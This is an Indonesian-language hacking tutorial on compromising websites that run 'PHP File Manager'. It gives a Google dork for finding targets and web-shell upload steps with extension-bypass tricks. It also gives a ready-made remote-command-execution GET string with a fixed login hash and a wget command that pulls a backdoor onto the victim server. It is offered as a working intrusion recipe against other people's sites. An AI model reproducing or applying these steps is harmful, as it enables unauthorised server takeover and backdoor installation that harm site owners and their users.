Dork:intitle:"PHP File Manager" ext:php (kembangin)
Ada 3 Cara:
Ok langsung aja ke yang pertama pertama kalian dorking pakai dork diatas kembangin lagi biar dapet yang fresh dan banyak
Dicara Yang Pertama Kalian Bisa Lansung Upload Shell kalian karena PHP Filemanager nya lansung kebuka seperti tampilan di gambar dibawah
Cara Upload Shellnya:Klik Upload > Upload shell mu ext : .php .phtml .php5 .php.fla .php.asolokentot:v
Bila Vuln Shell Akan Lansung Ke Upload Dan untuk Akses Tergantung Upload Di directory mana ( TERGANGUNG WEB)
Ok Lanjut Ke Cara Yang Kedua Biasany PHP Filemanager suka ada yang disuruh login,Nah bila nemu yang seperti itu :(, sans jgn sedih dulu, kita coba aja masukin username & password nya ini
Bila Masuk Akan Ada Bacaan :You are logged in , tau kan artinya apa? yap kita udh berhasil login pakai username dan password diatas
Nah kalau sudah login, bebas mau lo apain, upload shell juga bisa, jungkir balik juga bisa tampilan sesudah login
Note : USERNAME SAMA PASSWORD YANG TADI GW KASIH, GK SEMUA BISA DI PHP FILE MANAGER LAINNYA
Jadi Bila Tidak Bisa Memakai Cara Kedua OK kita coba yang terakhir
Kalo Sudah Begitu Kita Coba RCE
Parameter GET : ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
OK Lansung Aja
Masukan parameter di atas setelah phpfm.php (atau nama lain tempat filemanager tersebut) Bila Vuln Biasanya Ada Bacaan Error: Command not informed
Bingo Bila Nemu Yang Seperti itu lanjut kita coba wget backdoor , berikut command wget bagi yang belum tau :
command : wget https://site.com/file.php wget https://site.com/file.php -O gans.php
bila sudah wget backdoorny coba kita cek apakah ada atau tidaknya file
kita caranya: cukup site.com/phpfm.php?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=wget
Bila File yang kita wget ada disitu berarti shell kalian sudah terupload
Sekian dari Saya mohon maaf bila ada salah ketik ataupun ucapan
Thanks to:Phantom Ghost , Maxteroit , And All My Friend
#Thanks Authornya Podol :v